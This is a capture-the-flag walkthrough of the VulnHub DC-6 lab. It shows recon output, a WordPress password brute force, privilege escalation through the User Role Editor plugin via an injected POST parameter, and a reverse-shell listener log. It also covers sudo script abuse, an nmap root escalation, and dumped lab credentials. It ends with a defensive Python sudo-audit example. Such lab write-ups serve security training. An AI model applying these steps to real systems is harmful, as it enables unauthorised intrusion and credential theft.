DC-6 Walkthrough

Walkthrough of DC-6 challenge from vulnhub. Initial hints given from reviewing the challenge listing:

  • The name of the host is wordy
  • A password list can be determined using cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Walkthrough

A basic ping sweep finds the machine; throwing a default nmap scan at it finds two ports of interest, SSH (22) and HTTP (80). Of interest in the HTTP headers is the mention of the hostname wordy (in line with the initial hint).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:C3:AD:DB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9

wordy is added to the /etc/hosts file and it is off to have a look at the website.

A quick browse through the website shows it to be a fairly basic WordPress site. Checking it with wpscan reveals a few things of use.

root@kali:/var/www/html# wpscan --url http://wordy
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://wordy/
[+] Started: Tue May 14 20:30:56 2019

[+] Interesting header: LINK: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://wordy/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.25 (Debian)
[+] XML-RPC Interface available under: http://wordy/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://wordy/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-------+
| Name  |
+-------+
| admin |
+-------+
[!] Includes directory has directory listing enabled: http://wordy/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 5.1.1 (Released on 2019-03-13) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v2.1

[+] Name: twentyseventeen - v2.1
 |  Last updated: 2019-05-07T00:00:00.000Z
 |  Location: http://wordy/wp-content/themes/twentyseventeen/
 |  Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
[!] The version is out of date, the latest version is 2.2
 |  Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found passively

From looking at the initial output no obvious vulnerabilities are identified. It's a reasonably recent WordPress install with no detected plugins. As a next step a brute force of the user account logins is attempted using the password list created from the hints (command: wpscan --url http://wordy/ --wordlist /root/Documents/DC-6/passwords.txt).

[+] Enumerating usernames ...
[+] We identified the following 5 users:
    +----+--------+-----------------+
    | ID | Login  | Name            |
    +----+--------+-----------------+
    | 1  | admin  | admin           |
    | 2  | graham | Graham Bond     |
    | 3  | mark   | Mark Jones      |
    | 4  | sarah  | Sarah Balin     |
    | 5  | jens   | Jens Dagmeister |
    +----+--------+-----------------+
[!] Default first WordPress username 'admin' is still used
[+] Starting the password brute forcer
  Brute Forcing 'admin' Time: 00:00:50 <== > (2668 / 2669) 99.96%  ETA: 00:00:00
  Brute Forcing 'graham' Time: 00:00:39 <= > (2668 / 2669) 99.96%  ETA: 00:00:00
  [+] [SUCCESS] Login : mark Password : helpdesk01                              

  Brute Forcing 'sarah' Time: 00:00:40 <== > (2666 / 2669) 99.88%  ETA: 00:00:00
  Brute Forcing 'jens' Time: 00:00:46 <=== > (2663 / 2669) 99.77%  ETA: 00:00:00

  +----+--------+-----------------+------------+
  | ID | Login  | Name            | Password   |
  +----+--------+-----------------+------------+
  | 1  | admin  | admin           |            |
  | 2  | graham | Graham Bond     |            |
  | 3  | mark   | Mark Jones      | helpdesk01 |
  | 4  | sarah  | Sarah Balin     |            |
  | 5  | jens   | Jens Dagmeister |            |
  +----+--------+-----------------+------------+

Credentials for user mark successfully identified. Logging into the site shows user mark has a limited set of privileges. Reviewing the install shows a few plugins installed that wpscan failed to pick up. One of interest is User Role Editor version 4.24. Researching the plugin version shows a low-privilege user can exploit the plugin to escalate to administrator privileges: https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/.

Reviewing the sample exploit code at https://www.exploit-db.com/exploits/44595 and https://packetstormsecurity.com/files/147515/WordPress-User-Role-Editor-Plugin-Privilege-Escalation.html shows that the HTTP POST parameter ure_other_roles=["role1", "role2"] can be added to a user update request to grant the additional roles role1 and role2 to the logged-in user.

The route to a low-privilege shell on the box is via a custom malicious WordPress plugin. To do this the logged-in user needs to be able to upload and activate new plugins. A review of https://codex.wordpress.org/Roles_and_Capabilities suggests the additional roles needed are:

  • activate_plugins
  • edit_plugins
  • install_plugins
  • delete_plugins
  • update_plugins
  • manage_network_plugins
  • upload_plugins

Sending the profile update request with the additional privileges added now lets our user upload plugins.

Loading the malicious plugin and activating it gives us a low privilege shell on the machine.

root@kali-2018:~/Documents/DC-6# nc -lvp 5556
listening on [any] 5556 ...
connect to [192.168.139.131] from wordy [192.168.139.134] 38870
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
 21:13:15 up  1:28,  0 users,  load average: 0.01, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
whoami
www-data
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname
uname
Linux
$ uname -a
uname -a
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
$ cat /etc/issue
cat /etc/issue
Debian GNU/Linux 9 \n \l

Browsing through the machine the following file of interest is identified.

$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

SSH into the box using that username and password succeeds; now on to escalating privileges and the root flag.

Initial enumeration work as user graham identifies the following items of interest.

  • User graham can run the command /home/jens/backups.sh as user jens via sudo with no password.
  • User graham is in the devs group and can write to the file /home/jens/backups.sh

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:~$ ls -al /home/jens/backups.sh
-rwxrwxr-x 1 jens devs 50 Apr 26 02:19 /home/jens/backups.sh
graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)

This arrangement is dangerous: because graham can rewrite the script that sudo runs as jens, it effectively allows one user (graham) to execute any command as another user (jens). Let's do that.
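As an added example (not part of the original walkthrough), the check a defender would run for this class of misconfiguration: parse `sudo -l` output and flag any target command that the invoking user, or a group they belong to, can write. The sudo output, file mode and group membership are constructed from the values shown above; the names FileInfo, parse_sudo_rules, writable_by and audit are chosen here.

```python
import re
import stat
from collections import namedtuple
# Constructed sample: the `sudo -l` output the walkthrough shows for user graham on dc-6.
SUDO_L_OUTPUT = r"""Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
"""
# Constructed stand-in for os.stat() on the target: -rwxrwxr-x jens devs, mode as st_mode bits.
FileInfo = namedtuple("FileInfo", "mode owner group")
FILES = {"/home/jens/backups.sh": FileInfo(0o100775, "jens", "devs")}
USER, GROUPS = "graham", {"graham", "devs"}   # taken from the `id` output above

# One rule line as sudo -l prints it: "(runas) TAG: TAG: /path/one, /path/two args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_rules(text):
    """Return (runas_user, nopasswd, command_path) for each rule line in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and headers never start with "(runas)"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.split()[0]))
    return rules

def writable_by(info, user, groups):
    """True if user (a member of groups) can modify the file through owner, group or other bits."""
    if info.owner == user and info.mode & stat.S_IWUSR:
        return True
    if info.group in groups and info.mode & stat.S_IWGRP:
        return True
    return bool(info.mode & stat.S_IWOTH)

def audit(text, files, user, groups):
    """Flag sudo targets the invoking user can rewrite; fix is chmod g-w,o-w plus owner-only write."""
    findings = []
    for runas, nopasswd, path in parse_sudo_rules(text):
        info = files.get(path)
        if info is not None and writable_by(info, user, groups):
            how = "without a password" if nopasswd else "with a password"
            findings.append(f"{path}: writable by {user} yet runs as {runas} {how}")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(SUDO_L_OUTPUT, FILES, USER, GROUPS)))
```

On a live host the same logic applies with os.stat() and os.getgroups() in place of the constructed FILES and GROUPS; a clean result for backups.sh needs mode 0755 (or stricter) and ownership by jens or root.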

Swapping out the contents of /home/jens/backups.sh with /bin/bash and running it via sudo swaps us over to user jens. From there it is confirmed that user jens can run nmap as root with no password. This can be used to spawn a root shell (review https://gtfobins.github.io/gtfobins/nmap/ for how).

Root flag obtained.

Post-Exploitation

From enumerating the machine the following post-exploitation items of interest were identified. When attempting to crack hashes, https://hashcat.net/wiki/doku.php?id=example_hashes is useful for identifying the type of hash.

#1 – MySQL database credentials (from wp-config.php):

/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpressdb' );
/** MySQL database username */
define( 'DB_USER', 'wpdbuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'meErKatZ' );

#2 – WordPress password hashes. These were extracted from the database using the credentials found at step #1.


Running hashcat against the list so far only recovers the user password for mark (helpdesk01).
